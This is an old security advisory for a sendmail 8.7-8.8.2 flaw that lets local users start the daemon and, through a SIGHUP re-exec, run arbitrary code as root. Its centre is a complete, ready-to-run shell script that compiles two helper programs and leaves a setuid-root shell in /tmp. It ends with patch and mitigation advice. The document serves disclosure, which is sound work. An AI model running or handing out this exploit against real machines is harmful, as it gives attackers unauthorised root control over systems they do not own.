COMMAND

    sendmail

SYSTEMS AFFECTED

    Systems running sendmail 8.7-8.8.2

PROBLEM

    Sendmail is often run in daemon  mode so that it can "listen"  for
    incoming mail  connections on  the standard  SMTP networking port,
    usually port 25. The root user  is the only user allowed to  start
    sendmail this way, and sendmail contains code intended to  enforce
    this restriction.

    Unfortunately, due to a coding  error, sendmail can be invoked  in
    daemon mode in  a way that  bypasses the built-in  check. When the
    check is  bypassed, any  local user  is able  to start sendmail in
    daemon  mode.   In  addition,  as  of  version  8.7, sendmail will
    restart itself  when it  receives a  SIGHUP signal.  It does  this
    restarting  operation  by  re-executing  itself  using the exec(2)
    system  call.   Re-executing  is   done  as  the  root  user.   By
    manipulating  the  sendmail  environment,  the  user can then have
    sendmail execute an  arbitrary program with  root privileges.   In
    other words,  local users  can gain  root privileges  on the local
    machine.

    This  is  exploit  for  sendmail  smtpd  bug  (ver.  8.7-8.8.2 for
    FreeBSD, Linux  and may  be other  platforms).   This shell script
    does a root shell in /tmp directory.


#-------------------------------- CUT HERE -------------------------------------
#/bin/sh
#
#          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c
#
#
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh
#-------------------------------- CUT HERE -------------------------------------

SOLUTION

    Install a patch from your vendor if one is available or upgrade to
    the  current   version  of   sendmail.    Also,  take   additional
    precautions as:

        * Use the sendmail restricted shell program (smrsh)
        * Use mail.local

    Get qmail or zmailer.  Btw, on ftp.sendmail.org:/pub/sendmail  you
    can find new  sendmail (8.8.3 currently  while writing).   For how
    long?